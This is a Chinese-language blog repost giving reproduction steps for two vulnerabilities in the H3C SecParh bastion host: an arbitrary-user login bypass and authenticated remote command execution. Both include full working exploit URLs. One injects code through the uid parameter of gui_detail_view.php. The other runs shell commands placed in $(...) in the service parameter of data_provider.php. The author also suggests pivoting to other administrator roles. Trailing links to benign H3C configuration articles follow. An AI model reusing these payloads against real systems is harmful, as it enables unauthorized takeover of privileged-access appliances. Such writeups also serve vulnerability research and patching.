H3C SecParh堡垒机任意用户登录与远程执行代码漏洞

这篇具有很好参考价值的文章主要介绍了H3C SecParh堡垒机任意用户登录与远程执行代码漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

1.H3C SecParh堡垒机任意用户登录漏洞

1.1.漏洞描述

  在H3C SecParh堡垒机 get_detail_view.php 存在任意用户登录漏洞。

1.2.漏洞影响

  H3C SecParh堡垒机

1.3.漏洞复现

1.3.1.登录页面

  该漏洞版本的登录页面如下,2018年的。
H3C SecParh堡垒机任意用户登录与远程执行代码漏洞

1.3.2.构建URL

URL:https://IP地址:端口//audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin

H3C SecParh堡垒机任意用户登录与远程执行代码漏洞

1.4.总结

  这里确实成功登录上去了,若设定三权的话,可能存在把admin用户设定为类似与这里的审计管理员,那么就需要测试是否能够跳转到操作管理员或者其它的一些管理员账号上去。这里就不再深入测试,只是提供一个思路。

2.H3C SecParh堡垒机远程命令执行漏洞

2.1.漏洞描述

  H3C SecParh堡垒机data_provider.php存在远程命令执行漏洞,攻击者通过任意用户登录或者账号密码进入后台就可以构造特殊的请求执行命令。

2.2.漏洞影响

  H3C SecParh堡垒机

2.3.漏洞复现

2.3.1.登录页面

  该漏洞版本的登录页面如下,2018年的。
H3C SecParh堡垒机任意用户登录与远程执行代码漏洞

2.3.2.构建URL

URL:https://IP地址:端口/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(pwd)&identity_cond=&query_type=all&format=json&browse=true

  需要注意一定要通过先通过任意用户登录获取Cookie,然后在URL中service后面的括号中输入想要执行的命令,即可实现远程命令执行。
H3C SecParh堡垒机任意用户登录与远程执行代码漏洞

2.4.总结

  我使用火狐浏览器,我访问后就自动将信息进行下载,不过也有浏览器直接跳转界面的也行,都能够看到。文章来源地址https://www.toymoban.com/news/detail-448558.html

到了这里,关于H3C SecParh堡垒机任意用户登录与远程执行代码漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • H3C 远程登陆 telnet ssh 访问web

    客户要求:路由器R1可以通过telnet访问路由器R2 用户名:xuyue 密码:abc123456789 Telnet的端口是23 1.配置ip地址 2.开启telnet服务 3.创建用户名xuyue ,simple加密 创建密码,开启telnet服务 4.验证方式 5.在r1上配置接口ip地址 方法:H3C上开启telnet功能,创建登录用户,设置登录密码,设置

    2024年02月10日
    浏览(43)
  • 如何在vmware上部署H3C CAS平台并成功登录

    最近入职云部门,要学习一些H3C平台的东西,熟悉些平台用法,但是我自己肯定是没有硬件(服务器)的,就只有通过虚拟机去装CAS了。搞了好多天,查了不少资料,算是解决了问题装上了,下面是我的安装方法。 1.下载。 登录h3c官网,支持,软件下载,云计算,H3Cloud 虚拟

    2023年04月09日
    浏览(55)
  • H3C交换机限制远程(HTTP、HTTPS、Telnet、SSH)登陆

    1.需求: 基于网络安全因素,对局域网网络设备远程登陆(包括HTTP、HTTPS、Telnet、SSH)进行限制,只允许运维IP访问。 2.配置: 以H3C S5110V2(V5)及S5120V2(V7)交换机为例 创建ACL(为通用配置) [SW]acl number 2000 [SW-acl-basic-2000]rule 1 permit source 10.22.210.89 0 [SW-acl-basic-2000]rule 99 den

    2024年02月07日
    浏览(49)
  • 【H3C】配置AAA认证和Telnet远程登陆,S5130 Series交换机

     AAA配置步骤为: 1.开启telent远程登陆服务 2.创建用户,设置用户名、密码、用户的服务类型 3.配置终端登录的数量 4.配置vlan-if的ip地址,用来远程登陆 5.允许对应的vlan通过 1.开启telent远程登陆服务 sys                                                # 进入系统视图 te

    2024年01月22日
    浏览(49)
  • 华三H3C交换机配置端口镜像之如何配置本地端口镜像和远程端口镜像(可适用一个源端口镜像给多目的端口时)

    如何在华三交换机配置本地端口镜像和远程端口镜像 在平时的工作中,经常需要通过日志审计设备/行为管理设备/流量分析系统设备,对网络设备上的报文流量进行分析,以了解整个网络的运行情况,这时就需要通过端口镜像的技术通过把源端口的流量复制一份到目的观察端

    2023年04月22日
    浏览(45)
  • H3C交换机怎么切蒂删除H3C交换机VLAN?

    H3C交换机如何删除VLAN,如果直接使用“undo vlan”是删不干净的,因为配置VLAN时还配置过接口,下面就由小编介绍下具体操作吧 1、首先通过console口或telnet连接三层交换机,进入用户视图模式”“,如图所示: 2、在用户模式下输入”sys“进入系统视图模式”[H3C]“,如图所示

    2024年02月08日
    浏览(46)
  • H3C服务器带外默认账号和密码,H3C产品的默认密码是多少?

    H3C设备采用出厂配置启动时,通过Console口登录时认证方式为scheme,用户名和密码均为admin;设备采用空配置启动时,通过Console口登录时认证方式为none,可直接登录。登录成功之后用户角色为network-admin AP设备,在AP上开启允许TELNET登录时,telnet的密码是h3capadmin   H3C服务器产品

    2024年02月07日
    浏览(47)
  • H3C 综合实验

    设备改名 按照图示要求将其中设备改名,交换机sw111-sw555,路由器r1-r5 IP地址分配 按图示要求,将计算机设备及路由相应端口设置IP地址 链路聚合 在sw111和sw222之间的G1/0/1-2接口设置链路聚合,聚合链路编号为1,工作模式为trunk VLAN 在sw111、sw222上创建vlan 10、20,将G1/0/3置于v

    2024年02月07日
    浏览(47)
  • H3C无线配置

    一、拓扑 简介: HCL版本:V5.7.1,模拟器AC及交换机系统版本:V7 二、配置步骤: 配置设备间基本链路及IP路由、vlan、等,保障交换机和AC之间二层或者三层互通。 配置AP上线。 配置两个服务模板。(一个用vlan100,另一个用vlan200) *服务模板概念简介:定义一个包含了WiFi的

    2024年02月16日
    浏览(41)
  • H3C配置ACL

    随着网络规模的扩大和流量的增加,对网络安全的控制和对带宽的分配成为网络管理的重要内容。 通过对数据包进行过滤,可以有效防止非法用户对网络的访问,同时也可以控制流量,节约网络 资源。ACL(Access Control List,访问控制列表)即是通过配置对报文的匹配规则和处

    2024年02月04日
    浏览(49)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包